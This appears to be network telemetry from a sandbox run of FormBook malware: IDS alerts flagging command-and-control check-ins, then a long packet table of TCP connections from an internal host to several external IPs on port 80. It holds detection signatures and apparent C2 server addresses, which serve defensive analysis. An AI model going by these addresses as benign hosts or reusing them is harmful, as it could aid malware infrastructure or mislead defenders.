                                                                                      2024-11-13T09:28:15.300346+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4591043.33.130.19080TCP
                                                                                      2024-11-13T09:28:17.827029+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4591053.33.130.19080TCP
                                                                                      2024-11-13T09:28:24.003472+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.459106113.20.119.3180TCP
                                                                                      2024-11-13T09:28:26.550389+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.459107113.20.119.3180TCP
                                                                                      2024-11-13T09:28:29.144201+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.459108113.20.119.3180TCP
                                                                                      2024-11-13T09:28:31.644067+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.459109113.20.119.3180TCP
                                                                                      2024-11-13T09:28:38.300689+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45911047.129.103.18580TCP
                                                                                      2024-11-13T09:28:40.832105+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45911147.129.103.18580TCP
                                                                                      2024-11-13T09:28:43.409754+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45911247.129.103.18580TCP
                                                                                      2024-11-13T09:28:45.910009+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45911347.129.103.18580TCP
                                                                                      2024-11-13T09:28:51.797362+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45911438.47.237.2780TCP
                                                                                      2024-11-13T09:28:54.330228+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45911538.47.237.2780TCP
                                                                                      2024-11-13T09:28:56.906066+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45911638.47.237.2780TCP
                                                                                      2024-11-13T09:28:59.452166+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45911738.47.237.2780TCP
                                                                                      2024-11-13T09:29:06.175663+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.459118206.119.81.3680TCP
                                                                                      2024-11-13T09:29:08.769360+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.459119206.119.81.3680TCP
                                                                                      2024-11-13T09:29:11.316348+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.459120206.119.81.3680TCP
                                                                                      2024-11-13T09:29:13.863112+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.459121206.119.81.3680TCP
                                                                                      2024-11-13T09:29:19.904719+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.459122172.217.16.21180TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 13, 2024 09:26:43.860537052 CET4973680192.168.2.438.88.82.56
                                                                                      Nov 13, 2024 09:26:43.867105961 CET804973638.88.82.56192.168.2.4
                                                                                      Nov 13, 2024 09:26:43.867309093 CET4973680192.168.2.438.88.82.56
                                                                                      Nov 13, 2024 09:26:43.877887011 CET4973680192.168.2.438.88.82.56
                                                                                      Nov 13, 2024 09:26:43.884242058 CET804973638.88.82.56192.168.2.4
                                                                                      Nov 13, 2024 09:26:44.568723917 CET804973638.88.82.56192.168.2.4
                                                                                      Nov 13, 2024 09:26:44.568779945 CET804973638.88.82.56192.168.2.4
                                                                                      Nov 13, 2024 09:26:44.569268942 CET4973680192.168.2.438.88.82.56
                                                                                      Nov 13, 2024 09:26:44.621383905 CET804973638.88.82.56192.168.2.4
                                                                                      Nov 13, 2024 09:26:44.621859074 CET4973680192.168.2.438.88.82.56
                                                                                      Nov 13, 2024 09:26:44.622798920 CET4973680192.168.2.438.88.82.56
                                                                                      Nov 13, 2024 09:26:44.627928972 CET804973638.88.82.56192.168.2.4
                                                                                      Nov 13, 2024 09:26:59.679337978 CET5881780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:26:59.684766054 CET80588173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:26:59.684883118 CET5881780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:26:59.698765039 CET5881780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:26:59.704082966 CET80588173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:00.343401909 CET80588173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:00.343482971 CET5881780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:01.206331968 CET5881780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:01.211216927 CET80588173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:02.223941088 CET5881880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:02.228815079 CET80588183.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:02.228902102 CET5881880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:02.237179041 CET5881880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:02.242037058 CET80588183.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:03.753027916 CET5881880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:03.758673906 CET80588183.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:03.758743048 CET5881880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:04.771586895 CET5881980192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:04.776803017 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:04.777002096 CET5881980192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:04.784485102 CET5881980192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:04.789647102 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:04.789678097 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:04.789707899 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:04.789735079 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:04.789762974 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:04.789844036 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:04.789901972 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:04.789932013 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:04.789958000 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:05.405354977 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:05.405536890 CET5881980192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:06.299995899 CET5881980192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:06.305036068 CET80588193.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:07.317838907 CET5882080192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:07.323942900 CET80588203.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:07.324119091 CET5882080192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:07.329001904 CET5882080192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:07.334573984 CET80588203.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:07.950499058 CET80588203.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:07.950975895 CET80588203.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:07.951082945 CET5882080192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:07.953958035 CET5882080192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:07.958784103 CET80588203.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:13.319179058 CET5882280192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:13.324281931 CET8058822194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:13.324390888 CET5882280192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:13.340818882 CET5882280192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:13.345721006 CET8058822194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:14.243679047 CET8058822194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:14.243720055 CET8058822194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:14.243753910 CET8058822194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:14.243783951 CET8058822194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:14.244015932 CET5882280192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:14.244015932 CET5882280192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:14.394521952 CET8058822194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:14.394694090 CET5882280192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:14.846971989 CET5882280192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:15.871223927 CET5883880192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:15.876264095 CET8058838194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:15.876421928 CET5883880192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:15.884852886 CET5883880192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:15.889796972 CET8058838194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:16.921195984 CET8058838194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:16.921237946 CET8058838194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:16.921266079 CET8058838194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:16.921298027 CET8058838194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:16.921334982 CET8058838194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:16.921422958 CET5883880192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:16.921422958 CET5883880192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:16.922039986 CET8058838194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:16.922197104 CET5883880192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:16.922327995 CET8058838194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:16.922503948 CET5883880192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:17.393970966 CET5883880192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:18.413114071 CET5885480192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:18.418622017 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:18.418757915 CET5885480192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:18.449749947 CET5885480192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:18.454788923 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:18.454804897 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:18.454818010 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:18.454838991 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:18.454852104 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:18.454863071 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:18.454885006 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:18.454898119 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:18.454910040 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:19.306732893 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:19.306802034 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:19.306839943 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:19.306874990 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:19.306880951 CET5885480192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:19.306916952 CET5885480192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:19.623397112 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:19.623564959 CET5885480192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:19.957416058 CET5885480192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:20.986943960 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:20.992106915 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:20.992373943 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:21.047791004 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:21.053303003 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875041962 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875113964 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875152111 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875186920 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875224113 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875258923 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875294924 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875358105 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:21.875359058 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:21.875359058 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:21.875435114 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875507116 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:22.024329901 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:22.024697065 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:22.025183916 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:22.030061007 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:27.051245928 CET5890280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:27.056226015 CET80589023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:27.056289911 CET5890280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:27.064198017 CET5890280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:27.069055080 CET80589023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:27.678447962 CET80589023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:27.678498030 CET5890280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:28.565639973 CET5890280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:28.570643902 CET80589023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:29.588078976 CET5891780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:29.594635010 CET80589173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:29.594748974 CET5891780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:29.627119064 CET5891780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:29.632169008 CET80589173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:30.221040964 CET80589173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:30.221107006 CET5891780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:31.143930912 CET5891780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:31.149091959 CET80589173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.161731958 CET5893280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:32.167409897 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.167696953 CET5893280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:32.175096989 CET5893280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:32.180162907 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180272102 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180299997 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180326939 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180352926 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180448055 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180474997 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180502892 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180531025 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.802982092 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.803145885 CET5893280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:33.690890074 CET5893280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:33.696094990 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:34.708765030 CET5894880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:34.715574980 CET80589483.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:34.715662003 CET5894880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:34.721456051 CET5894880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:34.726347923 CET80589483.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:35.341252089 CET80589483.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:35.341774940 CET80589483.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:35.341840982 CET5894880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:35.345294952 CET5894880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:35.350215912 CET80589483.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:40.690731049 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:41.017846107 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:41.018006086 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:41.032186985 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:41.037049055 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.064431906 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.064449072 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.064512968 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:42.272655010 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.272710085 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.272761106 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:42.482034922 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.482060909 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.482078075 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.482090950 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.482315063 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:42.483247995 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.483400106 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:42.534775972 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:43.553097963 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:43.558041096 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:43.558126926 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:43.567522049 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:43.572403908 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.597100019 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.597152948 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.597203970 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:44.792308092 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.792363882 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.792432070 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:44.987910986 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.987951040 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.987987041 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.988006115 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:44.990034103 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.990091085 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:45.081419945 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:46.099471092 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:46.104316950 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.104409933 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:46.113253117 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:46.118179083 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118192911 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118207932 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118292093 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118304968 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118313074 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118366957 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118381023 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118392944 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.160398960 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.160418034 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.160509109 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.160557032 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.206604004 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.350872993 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.350899935 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.350977898 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.540983915 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.541006088 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.541022062 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.541038990 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.541078091 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.541078091 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.542181015 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.542227983 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.628257990 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:48.646856070 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:48.651788950 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:48.651951075 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:48.656856060 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:48.661876917 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170633078 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170670033 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170703888 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170758009 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170793056 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170828104 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170835972 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.170855045 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.170856953 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170870066 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.170902014 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.170996904 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.171034098 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.171065092 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.171072006 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.171103001 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.177561998 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177597046 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177632093 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177647114 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.177668095 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177716017 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.177804947 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177850008 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177886009 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177894115 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.222357988 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.257474899 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257544994 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257580996 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257612944 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257658958 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257693052 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257723093 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.257723093 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.257745028 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257749081 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.257777929 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257814884 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257819891 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.257900953 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257942915 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.258377075 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.258615017 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.258665085 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.259215117 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.259263992 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.260874987 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.266110897 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:55.315651894 CET5905880192.168.2.467.223.117.142
